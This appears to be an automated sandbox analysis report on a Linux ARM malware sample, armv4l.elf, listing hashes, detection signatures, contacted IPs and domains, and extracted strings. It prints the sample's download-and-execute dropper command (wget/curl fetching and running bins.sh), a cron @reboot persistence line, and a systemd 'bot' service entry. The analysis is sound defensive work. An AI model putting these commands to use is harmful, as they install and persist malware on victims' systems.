Linux Analysis Report
armv4l.elf

Overview

General Information

Sample name: armv4l.elf
Analysis ID: 1558943
MD5: b1de6afb7105e0da26b1a219f9f5031a
SHA1: e1b3179ec8a6646d27e522414487497720a273a8
SHA256: ad9ce965f543f4b0e2993d08f40bcb29753c9020b4093f4db2f894745c53c9ea
Tags: elfuser-abuse_ch
Infos:

Detection

Score: 68
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Executes the "crontab" command typically for achieving persistence
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions
Sample tries to persist itself using cron
Creates hidden files and/or directories
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection

barindex
Source: armv4l.elf Avira: detected
Source: armv4l.elf ReversingLabs: Detection: 34%
Source: armv4l.elf String: /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogarmv4l->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd@
Source: armv4l.elf String: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: armv4l.elf String: j2go/proc/net/tcp5.188.230.23137.18.73.94167.235.128.15168.191.23.13445.195.74.233141.94.21.7118.220.154.2118.210.151.8537.187.153.12745.195.74.1970123456789ABCDEF(crontab -l ; echo "@reboot %s") | crontab -/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"%s/.bashrca
Source: .bashrc.13.dr String: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: bot.service.13.dr String: ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: /bin/curl (PID: 5641) Reads hosts file: /etc/hosts Jump to behavior
Source: /tmp/armv4l.elf (PID: 5616) Socket: 127.0.0.1:4161 Jump to behavior
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: host.zopz-api.com
Source: global traffic DNS traffic detected: DNS query: daisy.ubuntu.com
Source: tmp.csTjpj.22.dr String found in binary or memory: http://serverip/bins/bins.sh
Source: bot.service.13.dr String found in binary or memory: http://serverip/bins/bins.sh;
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogarmv4l->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd@
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal68.troj.linELF@0/4@3/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5636) Crontab executable: /usr/bin/crontab -> crontab -l Jump to behavior
Source: /bin/sh (PID: 5635) Crontab executable: /usr/bin/crontab -> crontab - Jump to behavior
Source: /tmp/armv4l.elf (PID: 5618) File written: /root/.bashrc Jump to behavior
Source: /usr/bin/crontab (PID: 5635) File: /var/spool/cron/crontabs/tmp.csTjpj Jump to behavior
Source: /usr/bin/crontab (PID: 5635) File: /var/spool/cron/crontabs/root Jump to behavior
Source: /tmp/armv4l.elf (PID: 5618) File: /root/.bashrc Jump to behavior
Source: /bin/curl (PID: 5641) Directory: /root/.curlrc Jump to behavior
Source: /tmp/armv4l.elf (PID: 5628) Shell command executed: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -" Jump to behavior
Source: /tmp/armv4l.elf (PID: 5645) Shell command executed: sh -c "/bin/systemctl enable bot" Jump to behavior
Source: /bin/sh (PID: 5637) Chmod executable: /usr/bin/chmod -> chmod +x bins.sh Jump to behavior
Source: /bin/sh (PID: 5644) Chmod executable: /usr/bin/chmod -> chmod +x bins.sh Jump to behavior
Source: /bin/sh (PID: 5647) Systemctl executable: /bin/systemctl -> /bin/systemctl enable bot Jump to behavior
Source: /tmp/armv4l.elf (PID: 5616) Queries kernel information via 'uname': Jump to behavior
Source: /bin/curl (PID: 5641) Queries kernel information via 'uname': Jump to behavior
Source: armv4l.elf, 5616.1.00007fff0a8b9000.00007fff0a8da000.rw-.sdmp, armv4l.elf, 5618.1.00007fff0a8b9000.00007fff0a8da000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/armv4l.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/armv4l.elf
Source: armv4l.elf, 5616.1.000056538988c000.00005653899df000.rw-.sdmp, armv4l.elf, 5618.1.000056538988c000.00005653899df000.rw-.sdmp Binary or memory string: SV!/etc/qemu-binfmt/arm
Source: armv4l.elf, 5616.1.000056538988c000.00005653899df000.rw-.sdmp, armv4l.elf, 5618.1.000056538988c000.00005653899df000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: armv4l.elf, 5616.1.00007fff0a8b9000.00007fff0a8da000.rw-.sdmp, armv4l.elf, 5618.1.00007fff0a8b9000.00007fff0a8da000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: armv4l.elf, 5618.1.00007fff0a8b9000.00007fff0a8da000.rw-.sdmp Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs